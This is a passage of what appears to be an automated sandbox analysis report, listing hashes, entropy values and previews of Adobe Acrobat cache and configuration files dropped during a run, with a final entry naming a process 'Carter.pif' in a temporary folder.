                                                                          Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):295
                                                                          Entropy (8bit):5.36751859002522
                                                                          Encrypted:false
                                                                          SSDEEP:6:YEQXJ2HXBjM2vB3/dVlPIHAR0Y0DoAvJM3g98kUwPeUkwRe9:YvXKXBQ2vR/ZwHADGMbLUkee9
                                                                          MD5:76CFED16C5F07634C118CFCFFFC4EFA0
                                                                          SHA1:4E88088D2DDFAA725A353329D959FEE5654151E1
                                                                          SHA-256:33E892D1BB3C52985507DFD7ECEABA04AA15BB2F6636B590C4CD9137B91688A6
                                                                          SHA-512:642F305DCFF13735CDA2CACA784A77083B6BCEFFE8B951CEB8FF444D2C4629F0AA68B6A6F23A363C15D207E9100A7E5FC59D29DD1421AFA337A6B93D7CB4180C
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"62538152-f2b9-4c57-81d9-0d3ef568cfc4","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1734200276243,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):294
                                                                          Entropy (8bit):5.303035057634135
                                                                          Encrypted:false
                                                                          SSDEEP:6:YEQXJ2HXBjM2vB3/dVlPIHAR0Y0DoAvJfBoTfXpnrPeUkwRe9:YvXKXBQ2vR/ZwHADGWTfXcUkee9
                                                                          MD5:6251FC46F622F997FA3132B402527F1A
                                                                          SHA1:607EB503E18BA598F655524B469F995F9848FD27
                                                                          SHA-256:F75DD67594C842425463CA088D910D830A4B879B3D81006F4B1C04BEF03C1C91
                                                                          SHA-512:B8C22DE588B5670A041C9AEABD4B2D48014F4C0242DCE2BB7F20DB57581207C31DC182A35C71AFE54D838760505E9D68EBB79BA6A9C8B4EA105617E7A6FDD8C2
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"62538152-f2b9-4c57-81d9-0d3ef568cfc4","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1734200276243,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):294
                                                                          Entropy (8bit):5.280885151211205
                                                                          Encrypted:false
                                                                          SSDEEP:6:YEQXJ2HXBjM2vB3/dVlPIHAR0Y0DoAvJfBD2G6UpnrPeUkwRe9:YvXKXBQ2vR/ZwHADGR22cUkee9
                                                                          MD5:9025FBE727AC5D86F5737C24822D7FE6
                                                                          SHA1:F21FE4D2216A513B195B1CDC62405B2EECBAEC14
                                                                          SHA-256:DC222F17418DCBA5D04DC035C0052BF90DC4B64925B77328F91FACCA28C4B104
                                                                          SHA-512:C6A12B6F3F3027EAC7FA9CE8EE011FF05DB5E63A6FBB8E3B35DE2D8A528A57DB22966730ACC303D0C7A0BABE9DE2CAF2E68603444AD969C354A0DD62110648FD
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"62538152-f2b9-4c57-81d9-0d3ef568cfc4","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1734200276243,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):285
                                                                          Entropy (8bit):5.344612933191849
                                                                          Encrypted:false
                                                                          SSDEEP:6:YEQXJ2HXBjM2vB3/dVlPIHAR0Y0DoAvJfPmwrPeUkwRe9:YvXKXBQ2vR/ZwHADGH56Ukee9
                                                                          MD5:ACE10A44865E0E911F94BF1B549F0580
                                                                          SHA1:78BE1F736201B7402C5FCAB3AF16F45A2AEE46C1
                                                                          SHA-256:4E3485AD748BCDF887A1A1F581FE2A97320130BA8E97C1D4F29BDD8103CCDB3A
                                                                          SHA-512:D8B93837D3AE79CFF49EC63DF322DF3140FEF2D1820A191EA9530459DEC18EE9DAF1E2D3A2382DC04E32A2205B2FDC0F7CC0A74A586BE6EAAC3462D12E9F11C0
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"62538152-f2b9-4c57-81d9-0d3ef568cfc4","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1734200276243,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):1123
                                                                          Entropy (8bit):5.69291226354911
                                                                          Encrypted:false
                                                                          SSDEEP:24:Yv6XB/Jh0pLgE9cQx8LennAvzBvkn0RCmK8czOCCSmS:YvE/Jh0hgy6SAFv5Ah8cv/mS
                                                                          MD5:31CA50AA38D644E30361D610549C7A0E
                                                                          SHA1:5BD53B2AD0C3688717CA55791F72C62186453A6B
                                                                          SHA-256:90D0B1024922F40B69D29EBE2B9CBF092DF0AB0EF7D3156D65F7032AB65BEADD
                                                                          SHA-512:28378754FFB02D94399E70EB7963BB0F2F922C11A4E8BAC1965E1663309182F3D02758B4E6446CCAF0547A933BC102FB83304BA902087EC912DC5E383A8F1513
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"62538152-f2b9-4c57-81d9-0d3ef568cfc4","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1734200276243,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):289
                                                                          Entropy (8bit):5.293773692819184
                                                                          Encrypted:false
                                                                          SSDEEP:6:YEQXJ2HXBjM2vB3/dVlPIHAR0Y0DoAvJf8dPeUkwRe9:YvXKXBQ2vR/ZwHADGU8Ukee9
                                                                          MD5:1AB62CF1EC1464CA13AEE18E5FC1A616
                                                                          SHA1:25386D756008954C33064B2BB6291E957908EF85
                                                                          SHA-256:4EBD4E4E5CF68D394A1696FF2BFB3B138D2765C333D23BF4203E1ECDFD24A535
                                                                          SHA-512:D2E8F503B352475826017561C42EA56FF1636C84652441B9AF46395852E0846618463A6262B9B4A60C39CD3DE9E003A8BE86954E60A43CCDA51F8AB913D9AC87
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"62538152-f2b9-4c57-81d9-0d3ef568cfc4","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1734200276243,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):292
                                                                          Entropy (8bit):5.291878005137427
                                                                          Encrypted:false
                                                                          SSDEEP:6:YEQXJ2HXBjM2vB3/dVlPIHAR0Y0DoAvJfQ1rPeUkwRe9:YvXKXBQ2vR/ZwHADGY16Ukee9
                                                                          MD5:F4EE933A526D0C2B2D0DAD794A6C8761
                                                                          SHA1:84C2D1D8AFC449560B44F24C2F1C588DD794583C
                                                                          SHA-256:AE905615B36BD9E8DE2C6F98D91B556E122772BD8A07365A68E2D9F921DCB2EE
                                                                          SHA-512:2CB31E63B4CD13015FC606F8B5714CFAD2521ED69A8CE0508DAACB0D21574D09B808E16C09DA69AE7E07F1DF282A8F49F3FF6EF56E3A0696FB30038A0CCF1D36
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"62538152-f2b9-4c57-81d9-0d3ef568cfc4","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1734200276243,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):289
                                                                          Entropy (8bit):5.308695716777128
                                                                          Encrypted:false
                                                                          SSDEEP:6:YEQXJ2HXBjM2vB3/dVlPIHAR0Y0DoAvJfFldPeUkwRe9:YvXKXBQ2vR/ZwHADGz8Ukee9
                                                                          MD5:0D6695E11A8B5E8B298F86CD50B33488
                                                                          SHA1:FA70E96F2C417ECB162D5CA0B1A79E149E547C44
                                                                          SHA-256:D5F744CB6359C375A3147BA3373CA2E94321D44F952E4CC7E06E2D0076C66325
                                                                          SHA-512:550DD9BF29AD46294AE00EFF7451165D7994D9C82FB9432FF097AE0F741F191FBF1F468A07EDEEDABCE7ADAA6E8D84EBBFF137E65E0B104BE2BD253BF72C182F
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"62538152-f2b9-4c57-81d9-0d3ef568cfc4","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1734200276243,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):295
                                                                          Entropy (8bit):5.323246726347738
                                                                          Encrypted:false
                                                                          SSDEEP:6:YEQXJ2HXBjM2vB3/dVlPIHAR0Y0DoAvJfzdPeUkwRe9:YvXKXBQ2vR/ZwHADGb8Ukee9
                                                                          MD5:2A0FD6328A47D98BA9820C3A3E3A389C
                                                                          SHA1:09F86E21F3FDBA65858768C07CACE7E3A2CE9157
                                                                          SHA-256:0162D9CC80EB029E30B493F14ED3047E58F4D31EADA1AB4B7383CE629F99419C
                                                                          SHA-512:8FE9C6C08B3F3A3204876572CB82826947E24F89CEAFB39992B71E253759450816B2D75925ABF5894B08DE78AE6FB80CADFC86929B6C11163365D78CC28ACDCC
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"62538152-f2b9-4c57-81d9-0d3ef568cfc4","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1734200276243,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):289
                                                                          Entropy (8bit):5.3033650641862735
                                                                          Encrypted:false
                                                                          SSDEEP:6:YEQXJ2HXBjM2vB3/dVlPIHAR0Y0DoAvJfYdPeUkwRe9:YvXKXBQ2vR/ZwHADGg8Ukee9
                                                                          MD5:C0DD29A194625C93212190392013B39B
                                                                          SHA1:F70E3067EE031CCBC2FF406C3448C96027C1EF6F
                                                                          SHA-256:2991AD5379BCF12777CE244654CB8EBC87D39C5E88A40598D0FAF496F7221617
                                                                          SHA-512:A096F8FB6A895A5FAB3E83BD676C99E89602BD328A7D48F536C1BC4CF1E39F63D8EE92B27E25A392B6352A5B2019760B0BFACB6A98622BEE61AC2E6CAAAEB722
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"62538152-f2b9-4c57-81d9-0d3ef568cfc4","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1734200276243,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):284
                                                                          Entropy (8bit):5.289474681096934
                                                                          Encrypted:false
                                                                          SSDEEP:6:YEQXJ2HXBjM2vB3/dVlPIHAR0Y0DoAvJf+dPeUkwRe9:YvXKXBQ2vR/ZwHADG28Ukee9
                                                                          MD5:DA3F1025AA80CABE6FE8EA3BDA149544
                                                                          SHA1:9A879B96EA15438CC01AD0CBF3A6001BC78DB311
                                                                          SHA-256:3A1A0812A3021C0C030F0AEDE15FDE1F1C46EF5F4572CC421C201464E9DFF6D1
                                                                          SHA-512:6B80E7BCD78E8886CC1FDED0049E9B616828F3EEA6E06B07652E2CF2BCB5CD70B25EF4CD033C64707C2F7E6AA85F531F03C432067AF9488BF094832BCD544302
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"62538152-f2b9-4c57-81d9-0d3ef568cfc4","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1734200276243,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):291
                                                                          Entropy (8bit):5.286889034271227
                                                                          Encrypted:false
                                                                          SSDEEP:6:YEQXJ2HXBjM2vB3/dVlPIHAR0Y0DoAvJfbPtdPeUkwRe9:YvXKXBQ2vR/ZwHADGDV8Ukee9
                                                                          MD5:324086A88EA41F353B2A0BA6C94B0BEB
                                                                          SHA1:4D7EE391C9E3FF65D0F77681005DDCC091C07599
                                                                          SHA-256:B53C9BCB738B037976A9BF128953CCAC529A897136B1C4591DE614EA0083FB4B
                                                                          SHA-512:EE1C2EDFAB777363A9CCD3D2BB9732C4C964BA00B886BC9EE71D9693DE64E4F53CDBB9788238507893A81A9E02176202CBC50F5E9A05F75467465425B87EEFDF
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"62538152-f2b9-4c57-81d9-0d3ef568cfc4","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1734200276243,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):287
                                                                          Entropy (8bit):5.2853288109353915
                                                                          Encrypted:false
                                                                          SSDEEP:6:YEQXJ2HXBjM2vB3/dVlPIHAR0Y0DoAvJf21rPeUkwRe9:YvXKXBQ2vR/ZwHADG+16Ukee9
                                                                          MD5:3740C1DCA885472AE9EF81DD831BEB02
                                                                          SHA1:50B417A1A575DFDA639D80F352EC0838B6C3B925
                                                                          SHA-256:F74B4361A6E913226CF69286C95DB081B0B2C9F16166C30B60BD4712374AE146
                                                                          SHA-512:4FCA4C033DA29F721B0C2BB202A82B67CB7F960E1DC0A8B5A22F80D796923C151135E9171A43A270AF5EAD6C14A8F73C71628F406FB645D06E039CA9FA0B9E91
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"62538152-f2b9-4c57-81d9-0d3ef568cfc4","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1734200276243,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):1090
                                                                          Entropy (8bit):5.667493159216727
                                                                          Encrypted:false
                                                                          SSDEEP:24:Yv6XB/JhwamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSmS:YvE/Jh2BgkDMUJUAh8cvMmS
                                                                          MD5:E8AD4B6C9BD26D1990E27C554615231C
                                                                          SHA1:ED2B4763038F43EC99B5D1436B91452EC93C775F
                                                                          SHA-256:A3D975AE757F45157AE4D4DA41304683FA711B705F2BC5BC0BD448E4BC7BFCA1
                                                                          SHA-512:64C469273450EA21023CAFDF6B1A9E7D28D9F8F1979F7ADF16F710291A6AB246BD669EC3337F85F22FA9B0D4FE89B3D923C3E74AA6B6B441D8F8FA85A433F541
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"62538152-f2b9-4c57-81d9-0d3ef568cfc4","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1734200276243,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):286
                                                                          Entropy (8bit):5.260299531243386
                                                                          Encrypted:false
                                                                          SSDEEP:6:YEQXJ2HXBjM2vB3/dVlPIHAR0Y0DoAvJfshHHrPeUkwRe9:YvXKXBQ2vR/ZwHADGUUUkee9
                                                                          MD5:59EFDB37992698890957AE4D57EEDCBB
                                                                          SHA1:C78ED436F0A22AEDAF52ED979FB24D9959CD0579
                                                                          SHA-256:4DBC6434164E33306146A7589D5EDBD2CFB4EE5BC6A5265908FC51D54F260DD2
                                                                          SHA-512:4D1E4406F5CFDFDF550103AE06289FA54494A2290DEBD5D84C495C78AAE2299E4C203E9C4A3693E5FD483B78C42D053DE006F1B7622AFB944F3187B8ED26287A
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"62538152-f2b9-4c57-81d9-0d3ef568cfc4","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1734200276243,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):282
                                                                          Entropy (8bit):5.2719722613750015
                                                                          Encrypted:false
                                                                          SSDEEP:6:YEQXJ2HXBjM2vB3/dVlPIHAR0Y0DoAvJTqgFCrPeUkwRe9:YvXKXBQ2vR/ZwHADGTq16Ukee9
                                                                          MD5:BE5E926FF1EBAE9881BCE71594D23225
                                                                          SHA1:CF9EB31FE0C3C5E43B57BA7D0CCA8A7F2B0A450F
                                                                          SHA-256:8FEB6A5F28071E9203FB136B2A60318234F3733B5A1276009FB19F498D64CDDE
                                                                          SHA-512:898C1A67F13ED74F51755B50D7BA3A7EF3A3F327D20B2040CC9DCD21B99D2F4D98E90E9FB4EC87527C6945BB94166B4DD4C7AC85B66A6E4F2CDB87B7098D394D
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"62538152-f2b9-4c57-81d9-0d3ef568cfc4","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1734200276243,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):4
                                                                          Entropy (8bit):0.8112781244591328
                                                                          Encrypted:false
                                                                          SSDEEP:3:e:e
                                                                          MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                                          SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                                          SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                                          SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                                          Malicious:false
                                                                          Preview:....
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):2814
                                                                          Entropy (8bit):5.136032668143788
                                                                          Encrypted:false
                                                                          SSDEEP:24:Y4gXN6Iah3ay1T/BZe+/tDa06x2BOn6jUKP66ypljxcj0Sj9eAmo27P2LSjXCTSu:Y4A0Ta065xupMPB0+JvQTU9y
                                                                          MD5:26EF2714CD2947F54225F18653C821BC
                                                                          SHA1:3C71499EA8D4FCA2F48B27CA2F632C8CE9F85DF6
                                                                          SHA-256:66D55FAC9B3E65E58B56BFCF140151A52F4F4714619BC61CF30DDF69AA60101E
                                                                          SHA-512:270C1BEB13C7DD226704404C7EBD8204063626D9DACD5FEB571A9252455DA64BE4D3A1DC3CF805D887B59A7E99CBA7BBCA3F5CC422DFB5AD596FBCFC9DECA24C
                                                                          Malicious:false
                                                                          Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"138fc817ba3389373bef3056c4af4c83","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1734026845000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"dc425f2ed9957258b4e70d4da13721be","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1734026845000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"7c246e1daa4daf418e101cba1684bbcc","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1734026845000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"b18cd7fa5b412cc7d46764a2dee0a6bc","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1734026845000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"f713aaaa1e10e27ff23ace920f2a4d55","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1734026845000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"9d0cbb4862994ceafdef6ad2d1d6c54d","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 25
                                                                          Category:dropped
                                                                          Size (bytes):12288
                                                                          Entropy (8bit):1.3184749402599047
                                                                          Encrypted:false
                                                                          SSDEEP:24:TLKufx/XYKQvGJF7urs9Ohn07oz7oF0Hl0FopUEiP66UEiPbnPnNknNMeg/ktqV9:TGufl2GL7ms9WR1CPmPbPahgGypilICA
                                                                          MD5:D0CADB749013EEF2C448C5A253B5F661
                                                                          SHA1:CE12EED706C56D80601EFA16FB36ECECAD69789E
                                                                          SHA-256:0346FB46B3E0654C82EC3772C9BF1B6C4524E367936F8F80D6510D54E3BF3369
                                                                          SHA-512:693392C6C36BC129E4EE41660827A0F4EA50CCC0BD933DADFA2E3CAB86BE167DFCDD2C56A99DB9B2B3C3FBC0C07B3CDB508747ABB9FD1A2AD6D24802021CCD51
                                                                          Malicious:false
                                                                          Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:SQLite Rollback Journal
                                                                          Category:dropped
                                                                          Size (bytes):8720
                                                                          Entropy (8bit):1.779208564091413
                                                                          Encrypted:false
                                                                          SSDEEP:24:7+t1lhn07oz7oF0Hl0FopUEiP66UEiPbnPnNknNMeg/k4qVpaVrScVr0InTqLhxj:7MiWR1CPmPbPahg/ypilI2qFl2GL7ms5
                                                                          MD5:811F56E3332017FB84E1ACAF3D0A636E
                                                                          SHA1:6380500462775AE33EC9C0E5F61DFE9C03FDBF14
                                                                          SHA-256:B4C558E9E6A73F9C509F85691C0385429BA27DC72729C8FD3533F362FA183289
                                                                          SHA-512:7D3D96A563E8D1C57D53D05B0EB5E9A865B094C151006EBF761A697A34D8BAF1113297A7405605D4E0630FBBB457AEED15E45638D0F0C09E92E11C32B6B3BC72
                                                                          Malicious:false
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):66726
                                                                          Entropy (8bit):5.392739213842091
                                                                          Encrypted:false
                                                                          SSDEEP:768:RNOpblrU6TBH44ADKZEgdVxTHqzsKI/EHO4YxGX4U3ENYyu:6a6TZ44ADEzxTHqzstW4UUNK
                                                                          MD5:80766FB375EE6A3A8C3DC2828209EA36
                                                                          SHA1:53E79AFED6F262DDB44BFC0F7F23752E559C3095
                                                                          SHA-256:671F60502794606B68246EB11B92EB04240BB76990701500BDAE212190D07448
                                                                          SHA-512:3F2E8D4E3681CC44052B8B3BAA01D38E07F59ADA713365C604F485FACB9027519A8F4C5EA6FC24BD316071A7582E43E3289A70929AC780075F1B57AD541F4C37
                                                                          Malicious:false
                                                                          Process:C:\Users\user\AppData\Local\Temp\220239\Carter.pif
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):186
                                                                          Entropy (8bit):4.764657884065307
                                                                          Encrypted:false
                                                                          SSDEEP:3:RiMIpGXIdPHo55wWAX+TSyCVVh4EkD5mJKEufLOksaYuWGplZo5uWAX+TSyCVVhj:RiJBJHonwWDmLJkDjEYRswWGrywWDmLj
                                                                          MD5:59F6C76FD5648424A5A99E0BEFCE44D4
                                                                          SHA1:99A3B568CD90CC70959751D87285D7F44C6E49C7
